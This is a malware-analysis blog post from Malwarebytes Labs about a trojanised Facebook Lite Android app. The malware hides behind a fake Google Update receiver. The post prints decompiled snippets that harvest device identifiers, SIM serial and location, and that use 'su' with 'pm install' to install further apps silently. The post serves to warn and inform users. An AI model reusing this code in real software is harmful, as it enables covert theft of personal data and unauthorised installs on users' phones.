Mobile Menace Monday: Facebook Lite infected with Spy FakePlay

A version of the popular mobile app Facebook has been found to be infected with what we detect as Android/Trojan.Spy.FakePlay.  Facebook Lite is a more compact version of the popular app that uses less data and claims to work in all network conditions (i.e. where network conditions are poor).

The infected Facebook Lite works as advertised, but with the addition of malicious activities. It does this by using a malicious receiver and service  Note the use of using a receiver and service name that attempts to hide under what some may think is Google Update; something an untrained eye may not catch.

Service runs whenever the phone is booted, and immediately runs receiver

Log entry from Android Device Monitor

Receiver contains the bulk of the malicious code.  Below are some chunks of code that steal personal information, and installs additional malicious apps.

Code that steals and sends device ID, System Version, MAC address, Phone Model, Location, etc:
WifiInfo localWifiInfo = ((WifiManager)getSystemService("wifi")).getConnectionInfo();
HashMap localHashMap = new HashMap();
localHashMap.put("DeviceId", paramTelephonyManager.getDeviceId());
localHashMap.put("SystemVersion", Build.VERSION.RELEASE);
localHashMap.put("Mac", localWifiInfo.getMacAddress());
localHashMap.put("PhoneType", Build.MODEL);
localHashMap.put("NetworkOperatorName", paramTelephonyManager.getNetworkOperatorName());
localHashMap.put("SimSerialNumber", paramTelephonyManager.getSimSerialNumber());
localHashMap.put("Location", a());

Code to install additional apps:
localProcess = Runtime.getRuntime().exec("su");
PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());
localPrintWriter.println("chmod 777 " + paramString);
localPrintWriter.println("export LD_LIBRARY_PATH=/vendor/lib:/system/lib");
localPrintWriter.println("pm install -r  " + paramString);

The literal meaning of Trojan when it comes to computing is quote from Wikipedia any malicious computer program which is used to hack into a computer by misleading users of its true intent.  This particular piece of mobile malware is a perfect example; it misleads by infecting a legit app with malicious code and then hides its presence under the name of well-known corporation.

This infected version of Facebook Lite originates from China based on characters found in the code. China does not have access to Google Play and relies on third party apps stores that sometimes contain malicious apps like this.  If you in a country that has access to Google Play, we suggest using it over third party apps stores to avoid such infections.  Stay safe out there!

Malicious MD5 samples:

The post Mobile Menace Monday: Facebook Lite infected with Spy FakePlay appeared first on Malwarebytes Labs.

Source: Malwarebytes Labs @ March 6, 2017 at 10:20AM